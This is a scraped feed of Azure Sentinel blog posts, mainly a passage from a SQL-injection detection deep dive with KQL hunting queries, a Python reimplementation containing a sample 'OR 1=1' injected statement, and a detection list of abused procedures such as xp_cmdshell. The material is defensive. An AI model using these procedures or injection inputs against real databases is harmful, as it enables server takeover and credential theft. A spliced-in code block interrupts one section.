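<P>Try lowering trainingSlicesThreshold to 1 in the credential call: the two training-period clusters then count as “already seen” on this database and the detection burst is suppressed, which is exactly what the parameter is for. The 300-row read shows why the hard floor exists: it is more than ten standard deviations above the mean yet too small to matter, so it only alerts if volumeThresholdHardcoded is lowered below it.</P> <P>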
When the detection window contains such words but the number of flagged slices in the training period is at or below the threshold, an alert is triggered.</P> <P>&nbsp;</P> <H2>Hunting Queries</H2> <P>Hunting queries are designed for use in active threat hunts. Most threat hunting queries require some manual tuning, but this allows threat hunters to detect activity that may fall below detection baselines.&nbsp;</P> <P>&nbsp;</P> <P>These hunting queries focus on exploring the abuse of applications that communicate directly with SQL, such as web applications, management software and accounting software. Focussing on application activity allows us to establish predictable patterns of interaction with the database. These predictable behaviours provide loose baselines for our hunting queries.</P> <P>&nbsp;</P> <P>We can roughly identify SQL applications by grouping on the ApplicationName and PrincipalName columns. This provides combinations of applications with associated accounts, roughly mapping to each application in use.</P> <P>&nbsp;</P> <P>Each hunting query is built on top of the standard normalisation described above. For brevity each individual query will not include this normalisation step; complete queries can be found within the Azure Sentinel SQL solution.</P> <P>&nbsp;</P> <H3>Affected Row Anomaly</H3> <P>Azure SQL diagnostic logging provides the column affected_rows_d (AffectedRows after normalisation). This column contains a count of the rows that were impacted by the SQL query.</P> <P>&nbsp;</P> <P>In a real-world scenario, the attacker may attempt to dump the database schema, drop the table, or overwrite data in the database. 
Each of these commands would result in the exploited query affecting an unusually high number of rows when compared to normal database operation.</P> <P>&nbsp;</P> <P>Using our processed data, we can create a simple query which calculates the total number of operations for a given SQL application and then calculates the prevalence of each affected-row count. We can then tune the query to return only rows whose affected-row count represents 1% or less of that application’s operations.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">let threshold = 1; // return affected-row counts seen in at most 1% of an application's statements
let totals = processedData
    | summarize count() by PrincipalName, ApplicationName
    | extend joinKey = strcat(PrincipalName, ApplicationName)
    | project joinKey, count_;
processedData
// Count how often each affected-row value occurs per application and principal
| summarize count() by AffectedRows, PrincipalName, ApplicationName
| extend joinKey = strcat(PrincipalName, ApplicationName)
| join kind=leftouter (totals) on joinKey
// Prevalence: share of the application's statements that produced this affected-row count
| extend prevalence = round(toreal(count_) / toreal(count_1) * 100, 2)
| where prevalence &lt;= threshold</LI-CODE> <P>&nbsp;</P> <P>By using affected-row prevalence, the query detects not only outliers from normal operation with a high number of affected rows, but also outliers with low affected-row counts. An abnormally low number of affected rows may be indicative of manual SQL injection or SQL reconnaissance activity.</P> <P>&nbsp;</P> <H3>Execution Time Anomaly</H3> <P>As explored earlier, time-based SQLi is a reconnaissance technique that uses SQL commands to purposely delay execution. It is also common for SQLi attacks to result in longer execution times than normal, because the injected statement may introduce additional processing.</P> <P>&nbsp;</P> <P>This hunting query uses the Kusto <A href="#" target="_blank" rel="noopener">series_decompose_anomalies</A> function to detect queries that are executed in an anomalous amount of time. 
The following Kusto is used to prepare the processed data so that series_decompose_anomalies can be executed across it.</P> <P>&nbsp;</P> <P>First, the query summarises all SQL operations into 1-hour bins per user and application, taking the average duration in each bin. It then summarises again by user and application, collecting the per-bin averages into an ordered list of durations.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">// Parameters: timeSliceSize is the bin width; scoreThreshold is the anomaly strength passed to
// series_decompose_anomalies (1.5 is the function's default; the solution exposes it as a parameter)
let timeSliceSize = 1h;
let scoreThreshold = 1.5;
processedData
// Bin the data into 1h windows, taking the average execution time per user and application
| summarize AvgDurationMs = round(avg(DurationMs), 2), WindowStart = min(TimeGenerated), WindowEnd = max(TimeGenerated) by PrincipalName, ApplicationName, bin(TimeGenerated, timeSliceSize)
// Summarise by user and application and create chronologically ordered lists ready for anomaly detection
| sort by PrincipalName, ApplicationName, TimeGenerated asc
| summarize Durations = make_list(AvgDurationMs), WindowStarts = make_list(WindowStart), WindowEnds = make_list(WindowEnd) by PrincipalName, ApplicationName</LI-CODE> <P>&nbsp;</P> <P>With the data prepared, series_decompose_anomalies can be applied to the list of durations to detect outliers. This identifies hours where the average query duration increases, providing us with periods of time where possible time based SQLi could have occurred.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">// Returns three series: anomaly flags (1 spike, -1 dip, 0 normal), anomaly scores and the fitted baseline
| extend (AnomalyFlags, AnomalyScores, Baseline) = series_decompose_anomalies(Durations, scoreThreshold, -1, 'linefit')</LI-CODE> <P>&nbsp;</P> <P>Finally, the query expands the results of series_decompose_anomalies and re-joins them with the original data.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">// Expand the parallel lists so that each row is one time bin with its anomaly flag
| mv-expand TimeAnomaly = AnomalyFlags to typeof(int), WindowStart = WindowStarts to typeof(datetime), WindowEnd = WindowEnds to typeof(datetime)
| project WindowStart, WindowEnd, PrincipalName, ApplicationName, TimeAnomaly
| where TimeAnomaly == 1
// Split the query here to see raw anomaly results
// The next section re-joins the SQL diagnostics data to display the statements executed within the anomalous windows
| extend joinKey = strcat(PrincipalName, ApplicationName)
| join kind=leftouter (
    processedData
    | project ApplicationName, PrincipalName, Statement, TimeGenerated, DurationMs, ResourceId, ClientIp, HostName
    | extend joinKey = strcat(PrincipalName, ApplicationName)
    ) on joinKey
| where TimeGenerated between (WindowStart .. WindowEnd)
| project TimeGenerated, TimeAnomaly, WindowStart, WindowEnd, PrincipalName, ApplicationName, Statement, DurationMs, ResourceId, ClientIp, HostName
| order by DurationMs desc</LI-CODE> <P>&nbsp;</P> <P>The bin size (timeSliceSize) and the anomaly threshold (scoreThreshold) can both be configured. The threshold controls how strong an anomaly must be before a result is returned; increasing it makes the query less sensitive to minor fluctuations.</P> <P>&nbsp;</P> <H3>Boolean Blind SQLi</H3> <P>As covered earlier in the post, Boolean blind SQLi is one of the most common SQL injection reconnaissance techniques and is often used by automated database takeover tools.</P> <P>&nbsp;</P> <P>This hunting query processes the SQL statement to extract both sides of a Boolean expression. The query first identifies SQL statements that contain an “=” character. 
A regular expression is then used to extract either side of the “=”; the results are stored as the left and right sides of the comparison.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">let queryData = processedData
    | where Statement contains "="
    // Pull out every simple comparison of the form token = token (quotes are allowed inside the tokens)
    | extend extract_equals = extract_all(@"([a-zA-Z0-9\-\']+\s?=\s?[a-zA-Z0-9\-\']+)", Statement)
    | where isnotempty(extract_equals)
    | mv-expand extract_equals to typeof(string)
    // Trim surrounding whitespace so that "1 = 1" compares equal to "1=1"
    | extend left = trim(@"\s+", tostring(split(extract_equals, "=", 0)[0]))
    | extend right = trim(@"\s+", tostring(split(extract_equals, "=", 1)[0]));</LI-CODE> <P>&nbsp;</P> <P>We then need to separate the instances where the left and right sides of the comparison are wrapped in quotation marks, using a second regular expression to parse the correct portion of the statement.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">// No quotes on either side, e.g. 1=1
let cleanData = queryData
    | where left !contains "'" and right !contains "'";
// Quotes on both sides, e.g. 'a'='a'. We only care when the comparison is balanced, so statements with a
// quote on only one side are dropped early; the quoted pair is then re-extracted from the full statement
let quoteData = queryData
    | where left contains "'" and right contains "'"
    | extend extract_equals = extract_all(@"(\'[^']*\'\s?=\s?\'[^']*\')", Statement)
    | mv-expand extract_equals to typeof(string)
    | extend left = trim(@"\s+", tostring(split(extract_equals, "=", 0)[0]))
    | extend right = trim(@"\s+", tostring(split(extract_equals, "=", 1)[0]));</LI-CODE> <P>&nbsp;</P> <P>Finally, after processing, we can check whether the SQL statement contained a balanced comparison by comparing the right and left sides of the “=”.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">cleanData
| union quoteData
| where left == right
| extend alertText = strcat(left, "=", right)
| summarize AlertText = make_list(alertText) by TimeGenerated, Database, ClientIp, PrincipalName, Statement, ApplicationName, ResourceId</LI-CODE> <P>&nbsp;</P> <H3>Prevalence Based Query Size Anomaly</H3> <P>SQL injection will usually result in more parameters being added into the query. 
It is normally not possible for the attacker to remove existing parameters that are used by the legitimate page being exploited. Because the injected SQL is appended to an existing query, it is possible to baseline and then detect unusual numbers of parameters for a given user and application combination.</P> <P>&nbsp;</P> <P>This query uses a prevalence calculation to identify queries that have an unusual number of parameters for a given application and user. First the number of queries for each user and application group is calculated; this total is stored so that the overall prevalence of each query size can be calculated later.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">let prevalenceThreshold = 10; // return token counts seen in at most 10% of an application's statements
let total = processedData
    | summarize count() by PrincipalName, ApplicationName
    | extend key = strcat(PrincipalName, ApplicationName);</LI-CODE> <P>&nbsp;</P> <P>Next, the query splits each statement using “=” and a space as delimiters. Roughly, each “=” indicates an SQL parameter whilst each space separates a token, or query component. The query then summarises to count statements by username, application and number of tokens. This provides us with counts for each distinct token count observed for a given username and application.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">let anomalyData = processedData
    // Counting "=" gives a good estimate of the number of parameters
    | extend parameters = countof(Statement, "=")
    // Splitting on space gives a good estimate of the number of tokens in the query
    | extend tokens = array_length(split(Statement, " "))
    | summarize count(), make_set(parameters), make_list(TimeGenerated), make_list(ClientIp), dcount(ClientIp), min(TimeGenerated), max(TimeGenerated), make_list(Statement) by tokens, PrincipalName, ApplicationName;</LI-CODE> <P>&nbsp;</P> <P>Now that we have the total number of queries executed by each username and application, we can calculate the prevalence of each number of tokens observed. 
If that number of tokens represents less than 10% of the total queries executed, a row will be returned.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">| extend key = strcat(PrincipalName, ApplicationName)
| join kind=leftouter (total) on key
| extend prevalence = toreal(count_) / toreal(count_1) * 100
| where prevalence &lt;= prevalenceThreshold</LI-CODE> <P>&nbsp;</P> <P>SQL applications, especially those with pre-defined database interactions, generally produce consistent outcomes, so this query can help to flag anomalies where an unusual number of tokens was observed. There are limitations to this hunting query: if the attacker uses the same number of tokens as a legitimate function, no result will be returned. The query also needs application behaviour to be predictable, and is most effective with applications such as content management systems and other web applications.</P> <P>&nbsp;</P> <P>The query that is bundled as part of the SQL solution also allows additional filtering; this includes the ability to detect anomalies that only occurred on a single day.</P> <P>&nbsp;</P> <H3>Time Based Query Size Anomaly</H3> <P>This hunting query uses a similar mechanism to the prevalence based query size anomaly; however, instead of using prevalence to detect outliers, this query uses series_decompose_anomalies to detect spikes in the number of parameters or tokens for a given day of the week.</P> <P>First the query needs to prepare data for the series_decompose_anomalies function. Data is summarized into 1-day bins whilst calculating the average number of tokens and parameters for that window. 
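</P> <P>The prevalence calculation from the previous section, reimplemented in Python as an added example (not the SQL solution's own code) over a constructed batch of audit rows: the same per-user-and-application baseline, the same counting of “=” and spaces, and the same 10% threshold. The sample rows and function names are mine.</P>

```python
from collections import Counter, defaultdict

PREVALENCE_THRESHOLD = 10.0  # percent; plays the role of the page's prevalenceThreshold


def query_size(statement):
    """Approximate (parameters, tokens) exactly as the KQL does:
    countof(Statement, "=") and array_length(split(Statement, " "))."""
    return statement.count("="), len(statement.split(" "))


def prevalence_anomalies(events, threshold=PREVALENCE_THRESHOLD):
    """Token counts that are rare for a given user and application.

    Mirrors the three KQL steps: total statements per (PrincipalName,
    ApplicationName); statements per (user, app, tokens); prevalence =
    count / total * 100, keeping groups at or below the threshold.
    """
    total = Counter()
    per_size = defaultdict(list)
    for event in events:
        key = (event["PrincipalName"], event["ApplicationName"])
        total[key] += 1
        parameters, tokens = query_size(event["Statement"])
        per_size[(key, tokens)].append((event, parameters))

    results = []
    for (key, tokens), rows in per_size.items():
        prevalence = len(rows) / total[key] * 100
        if prevalence <= threshold:
            results.append({
                "PrincipalName": key[0],
                "ApplicationName": key[1],
                "tokens": tokens,
                "count": len(rows),
                "prevalence": round(prevalence, 2),
                "parameters": sorted({p for _, p in rows}),         # make_set(parameters)
                "ClientIps": sorted({e["ClientIp"] for e, _ in rows}),
                "Statements": [e["Statement"] for e, _ in rows],    # make_list(Statement)
            })
    return results


# Constructed baseline (not real telemetry): 18 well-formed lookups from one application
# (9 tokens each), one injected statement from a different client, and a second
# application with its own consistent shape.
SAMPLE_EVENTS = [
    {"PrincipalName": "webapp", "ApplicationName": "shop-frontend", "ClientIp": "10.0.0.5",
     "Statement": f"SELECT name, email FROM users WHERE id = {i}"}
    for i in range(1, 19)
] + [
    {"PrincipalName": "webapp", "ApplicationName": "shop-frontend", "ClientIp": "203.0.113.7",
     "Statement": "SELECT name, email FROM users WHERE id = 1 OR 1=1"},
] + [
    {"PrincipalName": "reporting", "ApplicationName": "nightly-report", "ClientIp": "10.0.0.9",
     "Statement": "SELECT count(*) FROM orders WHERE status = 'shipped'"}
    for _ in range(3)
]

if __name__ == "__main__":
    for row in prevalence_anomalies(SAMPLE_EVENTS):
        print(row["PrincipalName"], row["ApplicationName"], row["tokens"],
              f"{row['prevalence']}%", row["ClientIps"], row["Statements"])
```

<P>Lowering the threshold below the injected row's 5.26% prevalence makes it disappear, which is the tuning trade-off the limitations above describe.</P> <P>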
The data is then summarized using the username and application name to create lists of token and parameter averages.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">processedData
//Splitting on "=" provides a good estimate to the number of parameters in the query
| extend parameters = countof(Statement, "=")
//Splitting on space provides a good estimate to the tokens in the query
| extend tokens = array_length(split(Statement, " "))
//Bin the data into 1 day windows, taking the average of tokens and parameters for that user and application during the period
| summarize avg_tokens = round(avg(tokens), 2), avg_parameters = round(avg(parameters), 2), min(TimeGenerated), max(TimeGenerated) by PrincipalName, ApplicationName, bin(TimeGenerated, resolution)
//Summarise by user and application and create lists ready for anomaly detection
| summarize make_list(avg_tokens), make_list(avg_parameters), make_list(min_TimeGenerated), make_list(max_TimeGenerated) by PrincipalName, ApplicationName</LI-CODE> <P>&nbsp;</P> <P>With the prepared data we can call series_decompose_anomalies to identify anomalies in the number of tokens and parameters for a given day. We then keep results where a positive or negative anomaly is detected (too many or too few tokens for that day when compared to the baseline). 
It’s also important to record the start and end time of this activity so that we know when the anomaly occurred.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">| extend series_decompose_anomalies(list_avg_tokens, scoreThreshold, -1, 'linefit'), series_decompose_anomalies(list_avg_parameters, scoreThreshold, -1, 'linefit')
| mv-expand TokenAnomaly=series_decompose_anomalies_list_avg_tokens_ad_flag, ParameterAnomaly=series_decompose_anomalies_list_avg_parameters_ad_flag, WindowStart=list_min_TimeGenerated, WindowEnd=list_max_TimeGenerated
| project WindowStart, WindowEnd, PrincipalName, ApplicationName, TokenAnomaly, ParameterAnomaly
//Enable to detect SQL statement token anomalies
| where TokenAnomaly == 1 or TokenAnomaly == -1</LI-CODE> <P>&nbsp;</P> <P>Finally, the query creates a join key using the username and application name to join back to the original dataset. The start and end times recorded earlier can now be used to surface results within the time window of the anomaly.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">| extend joinKey = strcat(PrincipalName, ApplicationName)
| join kind=leftouter (
    processedData
    | project ApplicationName, PrincipalName, Statement, TimeGenerated
    | extend joinKey = strcat(PrincipalName, ApplicationName)
) on joinKey
| where TimeGenerated between (todatetime(WindowStart) .. todatetime(WindowEnd))
| extend Parameters = countof(Statement, "=")
| extend Tokens = array_length(split(Statement, " "))
| project TimeGenerated, ParameterAnomaly, Parameters, TokenAnomaly, Tokens, WindowStart, WindowEnd, PrincipalName, ApplicationName, Statement
| order by Tokens desc, Parameters desc</LI-CODE> <P>&nbsp;</P> <P>The results returned will represent activity occurring with an unusual number of tokens and parameters for that given time of day.</P> <P>&nbsp;</P> <H3>Suspicious Stored Procedures</H3> <P>Using the MSTIC sensor network, MSTIC can observe the commands most used by attackers when they gain access to an SQL database. 
Using this information, this hunting query shows SQL queries that contain the most abused SQL stored procedures.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">let abusedProcedures = dynamic(["xp_cmdshell", "xp_regwrite", "xp_regdeletekey", "xp_regdeletevalue", "xp_dirtree", "xp_fileexist", "xp_msver", "xp_makecab", "xp_sqlshell", "xp_fixeddrivesd", "xp_regread", "sp_configure", "sp_oacreate", "sp_password", "sp_OACreate", "sp_addextendedproc", "sp_dropextendedproc", "sp_makewebtask", "sp_delete", "SP_OAcreate", "sp_OADestroy"]);
AzureDiagnostics
| where Category =~ "SQLSecurityAuditEvents"
| where statement_s has_any (abusedProcedures)
| project TimeGenerated, SubscriptionId, ResourceId, ClientIp=client_ip_s, PrincipalName=session_server_principal_name_s, statement_s, action_id_s, HostName=host_name_s, ApplicationName=application_name_s</LI-CODE> <P>&nbsp;</P> <P>The above commands are often abused because they allow attackers to extend their access from the SQL database alone onto the underlying server. Executing command lines, manipulating registry keys, and performing directory traversal are all key components of successful onward exploitation.</P> <P>&nbsp;</P> <P>Commands such as "xp_dirtree" can be exploited to <A href="#" target="_blank" rel="noopener">allow attackers to capture MSSQL credentials</A>. This is especially useful to an attacker who only has access via SQLi through a web application, as it grants them direct database access. Credentials may also be reused to access other systems in the network.</P> <P>&nbsp;</P> <P>All the above procedures are <STRONG>not supported on Azure SQL Databases</STRONG>, because Azure SQL Databases run in a shared environment. The presence of these commands in Azure SQL Database logging most likely indicates opportunistic attempts if your database is exposed to the open internet.</P> <P>&nbsp;</P> <P>If you are running your own SQL server it is recommended that you disable commands that are not in use. 
Many of these commands are disabled by default.</P> <P>&nbsp;</P> <P><STRONG>First you must enable advanced options:</STRONG></P> <P>&nbsp;</P> <LI-CODE lang="sql">EXEC sp_configure 'show advanced options', 1
RECONFIGURE</LI-CODE> <P>&nbsp;</P> <P><STRONG>Then you can disable the chosen procedure, for example:</STRONG></P> <P>&nbsp;</P> <LI-CODE lang="sql">-- xp_cmdshell is exposed as a sp_configure option; procedures that have none (such as xp_dirtree) are restricted by revoking EXECUTE on them instead
EXEC sp_configure 'xp_cmdshell', 0
RECONFIGURE</LI-CODE> <P>&nbsp;</P> <P>If you leave any of these procedures enabled, a trap should be set in your SIEM for when they are executed.</P> <P>&nbsp;</P> <H2>Conclusion</H2> <P>The Azure Sentinel SQL solution allows security analysts and administrators to rapidly deploy a range of detection and hunting queries to their Azure Sentinel environment. As you have seen, there are numerous ways that SQL attacks can be detected. The ever-changing security landscape means it’s not always possible to detect attacks with a single query. It’s important to develop diverse detection and hunting queries using numerous novel approaches to provide the best possible visibility of SQL attacks.</P> <P>&nbsp;</P> <P>We hope this blog post has provided insight into how our detection and hunting queries work, and we are excited to see new hunting and detection queries built by the community.</P> <P>&nbsp;</P> <P>All the queries in this post can be found in full within the Azure Sentinel SQL solution. Additional hunting and detection queries written for Azure Sentinel can be found on the <A href="#" target="_blank" rel="noopener">Azure Sentinel GitHub</A>.</P> Mon, 09 Aug 2021 17:20:47 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-sql-solution-query-deep-dive/ba-p/2597961 TomMcElroy 2021-08-09T17:20:47Z What's new: Watchlists templates are now in public preview! 
https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-watchlists-templates-are-now-in-public-preview/ba-p/2614340 <P>As we know, each organization is unique and has different use cases and scenarios in mind when it comes to security operations. Nevertheless, we've identified several use cases that are common across many SOC teams.</P> <P>&nbsp;</P> <P>Azure Sentinel now provides built-in watchlist templates, which you can customize for your environment and use during investigations.</P> <P>After those watchlists are populated with data, you can correlate that data with analytics rules, view it in the entity pages and investigation graphs as insights, build custom uses such as tracking VIP or sensitive users, and more.</P> <P>&nbsp;</P> <P>Watchlist templates currently include:</P> <UL> <LI><STRONG>VIP Users</STRONG>. A list of user accounts of employees that have high impact value in the organization.</LI> <LI><STRONG>Terminated Employees</STRONG>. A list of user accounts of employees that have been, or are about to be, terminated.</LI> <LI><STRONG>Service Accounts</STRONG>. A list of service accounts and their owners.</LI> <LI><STRONG>Identity Correlation</STRONG>. A list of related user accounts that belong to the same person.</LI> <LI><STRONG>High Value Assets</STRONG>. A list of devices, resources, or other assets that have critical value in the organization.</LI> <LI><STRONG>Network Mapping</STRONG>. 
A list of IP subnets and their respective organizational contexts.</LI> </UL> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="image.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/300686iF747E4AA6BE1BAE0/image-size/large?v=v2&amp;px=999" role="button" title="image.png" alt="Watchlists templates insights in entity pages" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Watchlists templates insights in entity pages</span></span></P> <P>&nbsp;</P> <P>We've created the watchlist template <A href="#" target="_self">schemas</A>&nbsp;to be simple and extensible, so that you can populate them with the relevant data. More information about using the watchlist templates can be found <A href="#" target="_self">here</A>.</P> <P>&nbsp;</P> <P><FONT size="6">What’s next?</FONT></P> <P><STRONG>&nbsp;</STRONG></P> <P>Besides surfacing the watchlist template data inside the entity pages, we're working on embedding this information in the UEBA anomalies and in the entity risk score, which is planned next. Understanding whether a user is a VIP or a terminated employee, or whether an asset is an HVA, provides both context and security value for the analyst during an investigation.</P> <P>&nbsp;</P> <P>We Value Your Opinion!</P> <P>Our goal is to make your life easier while you investigate security incidents. If you have any feedback about the experience, the usage, or anything else, please let us know! 
We aim to improve.</P> <P>&nbsp;</P> Fri, 06 Aug 2021 09:32:45 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-watchlists-templates-are-now-in-public-preview/ba-p/2614340 Itay Argoety 2021-08-06T09:32:45Z What's new: ASIM File Activity schema https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-asim-file-activity-schema/ba-p/2609732 <P>Hello everyone,</P> <P>&nbsp;</P> <P>Continuing our&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-asim-authentication-process-registry-and-enhanced/ba-p/2502268" target="_blank" rel="noopener">normalization journey</A>, we now add the <A href="#" target="_self">file activity schema</A>.</P> <P>&nbsp;</P> <H2>Why should you care?</H2> <P>&nbsp;</P> <TABLE border="0" width="100%"> <TBODY> <TR> <TD width="50%" style="border-style: none; width: 40%;"> <P><SPAN data-preserver-spaces="true">In addition to the ASIM advantages (cross-source analytics, source-agnostic rules, and ease of use), the File Activity schema lets you write rules that span endpoint, server, and cloud activity. We have included parsers for&nbsp;</SPAN><STRONG><SPAN data-preserver-spaces="true">Sysmon, Microsoft 365 Defender for Endpoint, SharePoint, OneDrive, and Azure Storage</SPAN></STRONG><SPAN data-preserver-spaces="true">. For example:</SPAN></P> <P><SPAN data-preserver-spaces="true">&nbsp;</SPAN></P> <UL> <LI><SPAN data-preserver-spaces="true">Analyzing file activity is instrumental for ransomware detection. 
Now your on-prem ransomware analytics can secure cloud workloads.</SPAN></LI> </UL> <P><SPAN data-preserver-spaces="true">&nbsp;</SPAN></P> <UL> <LI><SPAN data-preserver-spaces="true">When looking for malware leftovers, you will find them on the affected endpoints&nbsp;</SPAN><STRONG><SPAN data-preserver-spaces="true">and&nbsp;</SPAN></STRONG><SPAN data-preserver-spaces="true">on cloud services that may have served to spread them.</SPAN></LI> </UL> </TD> <TD width="50%" style="border-style: none; width: 60%;"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Ofer_Shezaf_0-1628077271391.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/300420iA7280CF8422A727D/image-size/large?v=v2&amp;px=999" role="button" title="Ofer_Shezaf_0-1628077271391.png" alt="Ofer_Shezaf_0-1628077271391.png" /></span></TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <H2>Learn more</H2> <P>&nbsp;</P> <P>Read more about <A href="#" target="_blank" rel="noopener">Azure Sentinel Information Model</A> and the <A href="#" target="_blank" rel="noopener">File Activity schema</A>, and deploy the&nbsp;File Activity&nbsp;parser packs in a single click using an <A href="#" target="_blank" rel="noopener">ARM template</A>.&nbsp;</P> <P>&nbsp;</P> <P>Join us to learn more about the Azure Sentinel information model in&nbsp;<A href="#" target="_blank" rel="noopener">two webinars</A>:</P> <P>&nbsp;</P> <UL> <LI><STRONG>The Information Model: Understanding Normalization in Azure Sentinel: <A href="#" target="_blank" rel="noopener">Presentation</A>, <A href="#" target="_blank" rel="noopener">YouTube</A>.</STRONG></LI> <LI><STRONG>Deep Dive into Azure Sentinel Normalizing Parsers and Normalized Content: next week, register <A href="#" target="_blank" rel="noopener">here</A>.</STRONG></LI> </UL> <P><STRONG>&nbsp;</STRONG></P> <P>Special thanks to&nbsp;<A 
href="https://gorovian.000webhostapp.com/?exam=mailto:Yaron.Fruchtmann@microsoft.com" target="_blank" rel="noopener">@Yaron Fruchtmann</A>, who made all this possible.</P> <P>&nbsp;</P> <H2>Why normalization, and what is the Azure Sentinel Information Model?</H2> <P>&nbsp;</P> <P>Working with various data types and tables together presents a challenge. You must become familiar with many different data types and schemas, and write and use a unique set of analytics rules, workbooks, and hunting queries for each, even for those that share commonalities (for example, DNS servers). Correlation between the different data types necessary for investigation and hunting is also tricky.</P> <P>&nbsp;</P> <P>The Azure Sentinel Information Model (ASIM) provides a seamless experience for handling various sources in uniform, normalized views. ASIM aligns with the&nbsp;<A href="#" target="_blank" rel="noopener">Open-Source Security Events Metadata (OSSEM)</A>&nbsp;common information model, promoting vendor-agnostic, industry-wide normalization. ASIM:</P> <UL> <LI>Allows source-agnostic content and solutions</LI> <LI>Simplifies analyst use of the data in Sentinel workspaces</LI> </UL> <P>&nbsp;</P> <P>The current implementation is based on query-time normalization using KQL functions, and includes the following:</P> <UL> <LI><STRONG>Normalized schemas</STRONG>&nbsp;cover standard sets of predictable event types that are easy to work with and build unified capabilities on. The schema defines which fields should represent an event, a normalized column naming convention, and a standard format for the field values.</LI> <LI><STRONG>Parsers</STRONG>&nbsp;map existing data to the normalized schemas. Parsers are implemented using <A href="#" target="_blank" rel="noopener">KQL functions</A>.</LI> <LI><STRONG>Content for each normalized schema</STRONG>&nbsp;includes analytics rules, workbooks, hunting queries, and additional content. 
This content works on any normalized data without the need to create source-specific content.</LI> </UL> <P>Thanks!</P> Wed, 04 Aug 2021 12:00:11 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-asim-file-activity-schema/ba-p/2609732 Ofer_Shezaf 2021-08-04T12:00:11Z Understanding API connections for your Azure Sentinel Playbooks https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/understanding-api-connections-for-your-azure-sentinel-playbooks/ba-p/2593973 <P>In addition to being a Security Information and Event Management (SIEM) tool, Azure Sentinel is a Security Orchestration, Automation, and Response (SOAR) platform. Automation takes a few different forms in Azure Sentinel, from automation rules that centrally manage the automation of incident handling and response, to playbooks that run predetermined sequences of actions to provide powerful and flexible advanced automation to your threat response tasks.</P> <P>&nbsp;</P> <P><STRONG>In this blog we will be focusing on playbooks and understanding application programming interface (API) permissions, connections, and connectors in Azure Sentinel playbooks.</STRONG></P> <P>&nbsp;</P> <P>A playbook is a collection of response/remediation actions and logic that can be run from Azure Sentinel as a routine. It is based on workflows built in Azure Logic Apps which is a cloud service that helps you schedule, automate, and orchestrate tasks and workflows across systems throughout the enterprise. They are very powerful as they interact with Azure Sentinel features (they can update your incidents, update watchlists, etc.), and also with other Azure or Microsoft services and even third-party services. 
Whether you use out-of-the-box playbook connectors or the more generic HTTP connector, ultimately you will be interacting with various APIs.</P> <P>&nbsp;</P> <P>When creating playbooks, the solutions that we want to use to automate tasks need to have their own connector in Logic Apps (like Office 365 Outlook, Azure Sentinel, Microsoft Teams, Azure Monitor Logs…) or to expose an API so that we can use the generic HTTP connector. As each connector needs to create an API connection to the solution and authorize it, if you are getting started with playbooks you may find it challenging to figure out what permissions are required. For example, our playbook templates on GitHub may come with multiple connections. When you first deploy a template, you may notice the playbook fails when you run it for the first time due to lack of permissions. <STRONG>In this blog post we will cover some of the main connectors you may encounter when you use Azure Sentinel playbooks, different methods to authenticate, as well as permissions you may require</STRONG>.</P> <P>&nbsp;</P> <P>Before we move into specifics about identities and connectors, let’s quickly revisit the <STRONG>permissions needed to create and run a playbook in Logic Apps</STRONG>:</P> <UL> <LI>Permissions required to create a Logic App: <UL> <LI>Logic App Contributor in the Resource Group (RG) where the Logic App has been created</LI> </UL> </LI> <LI>Permissions required to run a Logic App: <UL> <LI>Azure Sentinel Responder in the RG where your Azure Sentinel workspace resides</LI> </UL> </LI> <LI>Permissions required for an Azure Sentinel automation rule to run a playbook: <UL> <LI>Azure Sentinel Automation Contributor in the RG where the playbook to be triggered by the automation rule resides (these are explicit permissions for a special Azure Sentinel service account specifically authorized to trigger playbooks from automation rules. 
It is not meant for user accounts.)</LI> </UL> </LI> </UL> <P>&nbsp;</P> <H2>Authorizing Connections</H2> <P>The first topic that we will cover is the type of identity you can use in a playbook to authorize a connection between Logic Apps and the solution of your choice. There are <STRONG>three types of identities</STRONG>:</P> <OL> <LI>Managed identity</LI> <LI>Service principal</LI> <LI>User identity</LI> </OL> <H3><SPAN>Managed Identity</SPAN></H3> <P><SPAN>A common challenge for developers is the management of secrets and credentials used to secure communication between the different components making up a solution. Managed identities eliminate the need for developers to manage credentials. To enable a managed identity on your Logic App, go to <EM>Identity</EM></SPAN><SPAN> and choose from: </SPAN></P> <UL> <LI><SPAN>A <EM>System assigned managed identity</EM>, which turns your Logic App into an identity/service account to which you can grant permissions.</SPAN></LI> <LI><SPAN>A <EM>User-assigned managed identity</EM>, which creates a separate Azure resource to which you can assign roles and permissions, and which you can reuse on other Logic Apps. </SPAN></LI> </UL> <P><SPAN>After enabling a managed identity we have to assign appropriate permissions to it. 
